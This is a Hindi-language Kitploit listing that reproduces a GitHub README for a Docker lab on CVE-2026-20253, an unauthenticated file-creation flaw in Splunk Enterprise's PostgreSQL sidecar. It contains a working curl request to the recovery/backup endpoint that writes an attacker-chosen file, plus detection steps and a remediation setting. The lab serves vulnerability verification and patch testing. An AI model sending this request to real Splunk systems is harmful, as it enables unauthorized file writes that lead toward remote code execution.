Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/pssec-io/cve-2026-20253
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubpssec-io/cve-2026-20253

CVE-2026-20253

CVE-2026-20253 के लिए POC

रिपॉजिटरी देखें
12 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-20253 — Splunk Enterprise प्री-ऑथ RCE लैब

अप्रमाणित मनमाना फ़ाइल निर्माण और कटाव PostgreSQL साइडकार के माध्यम से
CVSS 9.8 · क्रिटिकल · CWE-306 · सक्रिय रूप से शोषित (CISA KEV)


⚠️ अस्वीकरण

यह रिपॉजिटरी केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए है।
सभी परीक्षण आपके स्वामित्व वाले बुनियादी ढांचे पर या जिसके लिए आपके पास स्पष्ट लिखित अनुमति है, के विरुद्ध किया जाना चाहिए।
लेखक यहाँ प्रदर्शित तकनीकों या उपकरणों के दुरुपयोग के लिए कोई दायित्व स्वीकार नहीं करते हैं।
इसे कभी भी उत्पादन प्रणालियों या ऐसे वातावरणों पर न चलाएँ जिनके आप स्वामी नहीं हैं।


अवलोकन

CVE-2026-20253 Splunk Enterprise के 10.2.4 और 10.0.7 से नीचे के संस्करणों को प्रभावित करता है।
Splunk के साथ बंडल की गई PostgreSQL साइडकार सेवा दो आंतरिक HTTP एंडपॉइंट उजागर करती है:

root@kitploit:~
/v1/postgres/recovery/backup
/v1/postgres/recovery/restore

दोनों एंडपॉइंट में कोई प्रमाणीकरण जाँच (CWE-306) नहीं है, जिसका अर्थ है कि कोई भी नेटवर्क-पहुंच योग्य हमलावर बिना क्रेडेंशियल के उन्हें लागू कर सकता है। हमलावर-नियंत्रित backupFile पैरामीटर प्रदान करके, एक अप्रमाणित उपयोगकर्ता Splunk होस्ट फाइलसिस्टम पर मनमानी फ़ाइलें बना या काट सकता है — एक प्रिमिटिव जिसे शोधकर्ताओं ने पूर्ण पूर्व-प्रमाणीकरण रिमोट कोड निष्पादन में जोड़ा है।

गुणविवरण
CVECVE-2026-20253
CVSS स्कोर9.8 (क्रिटिकल)
CWECWE-306 — क्रिटिकल फ़ंक्शन के लिए प्रमाणीकरण गायब
प्रभावितSplunk Enterprise 10.0.x < 10.0.7, 10.2.x < 10.2.4
पैच किया गया10.0.7, 10.2.4
CISA KEV18 जून 2026 को जोड़ा गया

रिपॉजिटरी लेआउट

root@kitploit:~
.
├── Dockerfile                  # Vulnerable image  (splunk 10.2.3)
├── docker-compose.yml          # Vulnerable container on port 8000
├── patched.Dockerfile          # Patched image     (splunk 10.2.4)
├── patched-docker-compose.yml  # Patched container on port 8001
└── instructions                # Quick command reference

पूर्वापेक्षाएँ

  • Docker + Docker Compose v2
  • ~6 GB खाली डिस्क स्थान (Splunk इमेज बड़ी है)
  • Kali Linux या कोई भी Linux होस्ट जिसमें curl उपलब्ध हो

उपयोग

असुरक्षित इंस्टेंस प्रारंभ करें (पोर्ट 8000)

root@kitploit:~
docker compose -f docker-compose.yml up -d --build

Splunk के पूरी तरह से आरंभ होने तक लगभग 90 सेकंड प्रतीक्षा करें। प्रगति का अनुसरण करें:

root@kitploit:~
docker compose -f docker-compose.yml logs -f
# Ready when you see: "Ansible playbook complete"

Splunk वेब UI → http://localhost:8000
क्रेडेंशियल: admin / changeme


पैच किया गया इंस्टेंस प्रारंभ करें (पोर्ट 8001)

root@kitploit:~
docker compose -f patched-docker-compose.yml up -d --build

Splunk वेब UI → http://localhost:8001
क्रेडेंशियल: admin / changeme

दोनों कंटेनर एक साथ चल सकते हैं — पोर्ट्स को टकराव से बचाने के लिए ऑफसेट किया गया है।


परीक्षण

असुरक्षित इंस्टेंस का परीक्षण → HTTP 400 की उम्मीद करें

root@kitploit:~
curl -sk -X POST   "http://localhost:8000/en-US/splunkd/__raw/v1/postgres/recovery/backup"   -H "Authorization: Basic cHNzZWM6Cg=="   -d '{"database":"postgres","backupFile":"/tmp/poc"}'   -o /dev/null -w "HTTP Status: %{http_code}\n"

अपेक्षित: 400 — एंडपॉइंट मौजूद है, कोई प्रमाणीकरण लागू नहीं किया गया, अनुरोध संसाधित किया गया।

कंटेनर के अंदर फ़ाइल बनाई गई है, इसे सत्यापित करें:

root@kitploit:~
docker exec splunk-cve-2026-20253 ls -la /tmp/poc

पैच किए गए इंस्टेंस का परीक्षण → HTTP 401 की उम्मीद करें

root@kitploit:~
curl -sk -X POST   "http://localhost:8001/en-US/splunkd/__raw/v1/postgres/recovery/backup"   -H "Authorization: Basic cHNzZWM6Cg=="   -d '{"database":"postgres","backupFile":"/tmp/poc"}'   -o /dev/null -w "HTTP Status: %{http_code}\n"

अपेक्षित: 401 — अब प्रमाणीकरण लागू है, अनुरोध अस्वीकार कर दिया गया।


प्रतिक्रिया कोड संदर्भ

HTTP स्थितिअर्थ
400असुरक्षित — एंडपॉइंट हिट, कोई प्रमाणीकरण जाँच नहीं
401पैच किया गया — प्रमाणीकरण लागू
404साइडकार मौजूद नहीं / गलत पथ
000कंटेनर अभी तैयार नहीं है

वैकल्पिक: watchTowr स्कैनर

watchTowr Labs टीम ने एक डिटेक्शन स्क्रिप्ट प्रकाशित की है जो उपरोक्त जाँच को स्वचालित करती है:

root@kitploit:~
git clone https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
cd watchTowr-vs-Splunk-CVE-2026-20253
pip3 install requests
python3 watchTowr-vs-Splunk-CVE-2026-20253.py --host 127.0.0.1 --port 8000

लैब को रोकना

root@kitploit:~
# असुरक्षित को रोकें
docker compose -f docker-compose.yml down

# पैच किए गए को रोकें
docker compose -f patched-docker-compose.yml down

सुधार

तुरंत एक स्थिर संस्करण में अपडेट करें:

शाखास्थिर संस्करण
10.2.x10.2.4
10.0.x10.0.7

यदि आप तुरंत पैच नहीं लगा सकते, तो PostgreSQL साइडकार को अक्षम करने के लिए server.conf में निम्नलिखित जोड़ें और Splunk को पुनरारंभ करें:

root@kitploit:~
[postgres]
disabled = true

⚠️ यदि आप Edge Processor या SPL2 डेटा पाइपलाइन चला रहे हैं तो साइडकार को अक्षम न करें — यह उन सुविधाओं के लिए आवश्यक है।


संदर्भ

  • 🔴 Splunk आधिकारिक सलाह — SVD-2026-0603
  • 🔬 watchTowr Labs अनुसंधान और पहचान उपकरण — github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
  • 📋 CISA KEV प्रविष्टि — cisa.gov/known-exploited-vulnerabilities-catalog
  • 📰 द हैकर न्यूज़ लेख — स्प्लंक एंटरप्राइज की क्रिटिकल खामी हमलावरों को बिना प्रमाणीकरण के कोड चलाने देती है

कानूनी

यह लैब वातावरण केवल रक्षात्मक सुरक्षा अनुसंधान और शिक्षा के लिए प्रदान किया गया है।
कंप्यूटर सिस्टम तक अनधिकृत पहुंच कंप्यूटर फ्रॉड एंड अब्यूज़ एक्ट (CFAA), यूके कंप्यूटर मिसयूज़ एक्ट और दुनिया भर में समकक्ष कानूनों के तहत अवैध है।
जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें